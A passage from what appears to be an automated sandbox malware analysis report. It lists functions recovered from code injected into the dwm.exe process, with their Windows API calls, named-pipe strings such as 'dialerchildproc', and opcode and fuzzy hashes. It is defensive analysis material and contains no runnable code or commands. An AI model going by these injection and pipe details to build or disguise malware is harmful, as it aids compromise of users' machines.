1160c9eabc8 520->521 521->471
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 7cdc63451b69bc29292b48ce5e8b572541f10f68e69c8b9878c1adc1d1e47a85
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: BC81B2316403498AFA5CAB6594413D967A0FBBDB80F5984A9FB054779FFF3BC8868700
                                                                                Function 000001160CA1CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001160CA1CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001160CA1CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001160CA1ECCC,?,?,?,?,000001160CA1BF9F,?,?,?,?,?,000001160CA17AB0), ref: 000001160CA1CF2C
                                                                                  • Part of subcall function 000001160CA1D6CC: HeapAlloc.KERNEL32 ref: 000001160CA1D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF54
                                                                                  • Part of subcall function 000001160CA1D744: HeapFree.KERNEL32 ref: 000001160CA1D75A
                                                                                  • Part of subcall function 000001160CA1D744: GetLastError.KERNEL32 ref: 000001160CA1D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: cb4390f6961ed6b9396b0974b2ba38b6b8c0e1728fb321c83c064ca045ffbcea
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3F41A23438138445FB6DA77D59513ED22929B8D7B8F2407A4BF364A6EEDE2FD4C19200
                                                                                Function 000001160CA12244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: d8e38c265cc2591fed5b845a1e9ed54dacbffdcb23e87e0e2915a52c9866d07e
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 26213A76618B9082FB188B29F4543DAA7A0F789BA4F504255FF5903BA8CF3DC589CB00
                                                                                Function 000001160CA1A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 93d23abf68d1e6e82d08775b53c47137bf62e89ca0d236ad7368ba212f83e994
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 34E18972605B808AEB289F69D4803DE7BA4F749B98F140156FF8957B9ACB39C9C1D700
                                                                                Function 000001160C9E9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: e8bf5cb6df6ba34a33c38932158f4eac1ba22fe0c4fa4ffec722413b5d166927
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 85E1BD72604B908AEB68DF69D4803DD7BA0F769B98F110159FF8957B9EEB36C091C700
                                                                                Function 000001160CA1F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 19b8957331cd1298c4271a9cb1997f1aaf463dbead02a3c165931a55f1f852cb
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: E741C272316B9085EB1ACBABAC107D56395B74DBE0F094165BF0A8778CEE3EC8C58314
                                                                                Function 000001160CA1104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: e11abde77124ee2b2982e20c3ca985293e0460767c9a98d2c09261830eafcf69
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: F4412972214B8486E764CF26E4547DEB7A1F388B98F448129EF8907A5CDF39D589CB40
                                                                                Function 000001160CA1D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 343c9458720370ca65d3adc563c79ef422e7c1c82b765a0922e02fd96b50e0e3
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: B5116030B0478445FB6EA77D5A513E962429B4C7F0F5843A4BF3A466EEDE2AC4C28300
                                                                                Function 000001160CA17510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: a16568b443831e9fdc0528162ae8309fa9bca582ff67e141a8f5e22f45a5b3d1
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 8C81C3317013458AFB5CAB2EA8513D922D1A78D780F1464A5BF05C779EEB3BC9C58700
                                                                                Function 000001160CA19DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: f63f1d3d351b206fec5390dcbfeb02647033de5548cb123eff403e22f2a337f1
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 2131C231212B50A1EF19DB6AE4207D662A4B74CBA0F590565BF1E0B7D8EF3AC4C5C310
                                                                                Function 000001160CA23DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: e5b7830e206334787690fbe57ac68d7df4382751a717d101e60cb95e0e7407ab
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 55115831215B9086E7548B5BE864399A6A4F78CFE4F044264FF5A87BA8CB3AC8948740
                                                                                Function 000001160CA12F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: 9b0ef131fb9825df778914c09ef9612f011c520855aab302bb387528f792e4a9
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 04318032702B5586EB19DF1AE5407E967A0FB48B84F084164BF4847B69EF36D4E1C700
                                                                                Function 000001160CA1CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 195f7eb4e80f3f5a9b5e7a1d2f2fba48434672648ca149a1aac59ca27619103f
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: D4119A3064138046FB6DA76E9A513ED2242AB8C7F4F1403A4BF36476EEDE2A88C19200
                                                                                Function 000001160CA1199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: ac7412eb1b92b5e920b4b7b3f8e1492db8961f8862413f30b6093098649facf0
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A4013531301B9482EB189B5BA8683D963A5B78CBC0F884075EF4943758DE3AC9898700
                                                                                Function 000001160CA136C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: e400b6bd58958b5eebd7366823e46fc8275a67c19d542b9387363af643069dca
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 02016174616B4086FF289B16F8283D563A0BB4DB81F044564FF4907769EF3EC584C700
                                                                                Function 000001160CA18FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: 6e4a873323f93f32762c688842e0ea3500328160282a5a2a3fd59b3d01ccc6de
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 6A51AF326017108AEB98CF29E858BDA37A6F348BA8F1485A4FF464774CDB36D9C1C700
                                                                                Function 000001160CA11A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d3d378882cb347c693712bbda87589f3abb20c5979bc6251fe05b18d2c282b62
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 60F0317270475592E7648B29F8947D96760F74CB88F944060EF494655CDB3DCACDCB00
                                                                                Function 000001160CA13044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 15cf77f13ed283d02a1c3f009e91b876ed1fe72c2f290a3f76b1d71983edd001
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: 32F0F874615BA482EA188F5BB9241D966A1AB4CFD0F0891A0FF5A47B2DDE39C8958700
                                                                                Function 000001160CA1BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: b84acfcdd47c5a30c6d07e30e5baf9b8b7194084d14c0ab62ff7a0d168872efb
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 44F062B121271482EB188B2EE4547D96320EB8CB65F540299FF6A451E8CF2EC9C48350
                                                                                Function 000001160CA15710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                                • Instruction ID: 82766d938135f85c9150c498c3b7db0e43f472018681bf26083b0a62d0a00ed9
                                                                                • Opcode Fuzzy Hash: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                                • Instruction Fuzzy Hash: 69619536919B84C6E768CB59E45439AB7A0F3C8784F101556FF8E87BA8DB7DC4808B40
                                                                                Function 000001160CA24104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 0a9fa6af542275ae2c9ed23ec6489d096ae3d5db8839ba6daf24dda60fdb4a87
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 87115136A10F7111F76C166ED4753E56141AB6C3B8F1806A4FF76066DECA26CCC16300
                                                                                Function 000001160C9F3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 48188c797cd57b4bfd20ce852eb8ce83f576900a31149de147f036e6788ef631
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 38115132AD4B5119FBAE1968E4553F921817BDC374F4887B8BF7A066FE8A2EC8474110
                                                                                Function 000001160C9EF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: d61bcce09444ef0e9cb468f635604e665c7395d4ffb9001444836e1c197a3f9f
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: EB61D47260074482FA6D8BA4E5443EE6AA0F7AD780F514597FB4A077ADFB37C946C300
                                                                                Function 000001160CA1AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: f30031f47c9e4201120f40a79fda595582c6c5f83fe50cb60d29b2ed52fbba5d
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 6A617B33605B888AEB28DF69D4803DD77A0F748B98F044255EF8917B9CDB39C995C700
                                                                                Function 000001160CA1AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
